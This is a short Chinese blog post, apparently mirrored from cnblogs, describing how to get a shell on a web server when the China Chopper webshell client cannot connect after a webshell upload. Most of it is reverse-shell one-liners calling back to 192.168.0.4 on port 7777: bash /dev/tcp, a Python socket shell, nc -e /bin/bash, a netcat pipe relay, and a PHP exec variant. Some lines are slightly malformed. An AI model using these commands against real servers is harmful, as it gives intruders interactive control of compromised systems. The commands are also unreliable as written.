zoukankan      html  css  js  c++  java
  • 菜刀失效以后得到web的方法

    在往常的测试过程中,有时费劲千辛万苦终于拿到了上传权限,美滋滋的上传了一句话,下一步的操作就是拿出菜刀连接,却发现菜刀失效了(没有被狗查杀和waf拦截,搞不懂为什么菜刀不能连接)。菜刀不行以后只能通过其它方式-通过nc反弹一个shell。

    nc是netcat的简写,有着网络界瑞士军刀的美誉。通过执行nc的命令可以得到webshell。

    首先,使用nc在kail上监听端口:

    nc -lvp 7777

    第二步:bash -i >& /dev/tcp/192.168.0.4/7777 0>&1

    从上图可以看到,已经成功拿到了shell。

    还可以通过python反弹:

    python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.0.4',7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);

    使用NC反弹shell:

    nc -e /bin/bash 192.168.0.4 7777

    nc -lvp 777

    如果不支持-e参数的话,可以利用linux中的管道符:

    服务端:nc  -nvlp 7777

                  nc -nvlp 6666

    客户端:

    nc 192.168.0.4 6666|/bin/bash|192.168.0.4 7777

    使用PHP方式反弹shell:

    php- 'exec("/bin/bash -i >& /dev/tcp/192.168.0.4/7777")'

  • 相关阅读:
    SOJ 1035 DNA matching
    SOJ 1027 MJ,Nowhere to Hide
    SOJ 1021 Couples
    SOJ 1020 Big Integer
    C#中正则表达式的简单使用
    根据HTTP header收集客户端相关信息 --- tornado demo
    IIS7配置Gzip压缩
    网站性能工具Yslow的使用方法
    配置ETags
    细说ETags以及如何在 IIS6和 IIS7下取消ETags
  • 原文地址:https://www.cnblogs.com/yonghegn/p/10045054.html
Copyright © 2011-2022 走看看